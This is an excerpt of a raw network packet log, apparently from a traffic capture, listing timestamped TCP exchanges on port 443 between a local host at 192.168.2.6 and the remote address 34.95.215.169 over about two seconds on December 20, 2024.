                                                          Dec 20, 2024 15:28:37.951097965 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:37.951189041 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:37.955907106 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:37.956121922 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:37.960716963 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:37.960834980 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:37.965460062 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:37.965553999 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:37.969228983 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:37.969315052 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.047238111 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.047333002 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.050255060 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.050436020 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.052280903 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.052496910 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.101980925 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.102159977 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.106437922 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.106547117 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.110364914 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.110426903 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.116053104 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.116148949 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.120773077 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.120893955 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.124718904 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.124792099 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.130285025 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.130373001 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.134103060 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.134248972 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.138843060 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.138964891 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.143495083 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.143588066 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.148363113 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.148539066 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.152188063 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.152388096 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.157865047 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.158056974 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.248508930 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.248589039 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.250786066 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.250880957 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.254529953 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.254600048 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.295037985 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.295137882 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.299319029 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.299420118 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.303226948 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.303776979 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.307781935 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.307918072 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.312728882 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.312808990 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.318336964 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.318531990 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.322993994 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.323069096 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.326884031 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.326965094 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.331656933 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.331723928 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.335475922 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.335540056 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.341275930 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.341342926 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.345225096 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.345298052 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.349737883 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.349850893 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.443048954 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.443262100 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.445693016 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.445765972 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.448219061 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.448276043 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.486833096 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.486944914 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.491568089 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.491648912 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.496216059 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.496315002 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.500344038 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.500518084 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.504976988 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.505090952 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.510591984 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.510684013 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.514410973 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.514497042 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.519224882 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.519325018 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.523035049 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.523107052 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.528702974 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.528847933 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.533471107 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.533572912 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.538211107 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.538302898 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.542020082 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.542109013 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.546752930 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.546854019 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.661340952 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.661592007 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.663566113 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.663678885 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.666089058 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.666217089 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.714134932 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.714513063 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.717789888 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.717911005 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.721692085 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.721791983 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.724085093 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.724183083 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.728822947 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.728914022 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.733253956 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.733354092 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.738594055 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.738684893 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.742311001 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.742456913 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.746897936 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.746961117 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.747026920 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.752274036 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.752377987 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.756889105 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.757066011 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.760730028 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.760801077 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.766005039 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.766088963 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.852271080 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.852354050 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.854727983 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.854846954 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.857914925 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.858020067 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.905677080 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.905791044 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.908966064 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.909074068 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.912621975 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.912739038 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.916188955 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.916349888 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.919822931 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.919913054 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.924670935 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.924793959 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.929836035 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.929928064 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.933494091 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.933582067 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.938030958 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.938114882 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.941796064 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.941893101 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.947572947 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.947652102 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.951801062 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.951889992 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:38.955492973 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:38.955610037 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.045643091 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.046144962 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.048051119 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.048315048 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.050477028 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.050599098 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.098656893 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.098931074 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.101197004 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.101279974 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.105710983 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.105808020 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.109019995 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.109117985 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.114037991 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.114130974 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.119760990 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.119829893 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.123373985 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.123452902 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.126677990 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.126775026 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.130362988 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.130450964 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.135890961 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.136006117 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.140443087 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.140513897 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.144100904 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.144188881 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.150413990 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.150494099 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.153239965 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.153312922 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.244287968 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.244409084 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.246738911 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.246813059 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.249408007 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.249495983 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.292675972 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.292817116 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.296590090 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.296664000 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.299705029 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.299810886 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.303888083 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.304040909 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.307645082 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.307750940 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.313127995 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.313352108 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.317611933 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.317692995 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.321352005 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.321429014 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.326982021 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.327038050 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.330835104 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.330913067 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.334029913 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.334111929 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.336874008 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.337013006 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.340447903 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.340606928 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.435386896 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.435493946 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.437988997 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.438093901 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.440402985 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.440499067 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.485282898 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.485430956 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.489216089 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.489341974 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.492275000 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.492374897 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.495775938 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.495834112 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.498197079 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.498433113 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.502794981 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.502859116 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.505466938 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.505553007 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.508311033 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.508375883 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.511037111 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.511127949 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.515572071 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.515660048 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.518440008 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.518517971 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.521990061 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.522113085 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.525691032 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.525791883 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.626769066 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.626936913 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.628941059 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.629053116 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.631952047 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.632026911 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.684065104 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.684209108 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.687050104 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.687127113 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.690730095 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.690865040 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.694175959 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.694269896 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.697813988 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.697884083 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.701482058 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.701555967 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.704304934 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.704381943 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.707863092 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.707950115 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.710645914 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.710760117 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.714297056 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.714369059 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.717206955 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.717278957 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.721534014 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.721626997 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.724303961 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.724416018 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.727108955 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.727188110 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.821788073 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.821898937 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.824222088 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.824302912 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.826926947 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.827016115 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.878340960 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.878551006 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.882023096 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.882309914 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.884969950 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.885212898 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.888118982 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.888185978 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.891783953 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.891877890 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.895415068 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.895524025 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.899889946 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.899976969 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.902738094 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.902874947 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.906346083 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.906553984 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.909164906 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.909266949 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.913631916 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.913713932 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.916496992 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.916563988 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:39.919178963 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:39.919267893 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.014180899 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.014277935 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.017138958 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.017244101 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.019603968 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:40.019666910 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:40.069736004 CET4434974334.95.215.169192.168.2.6
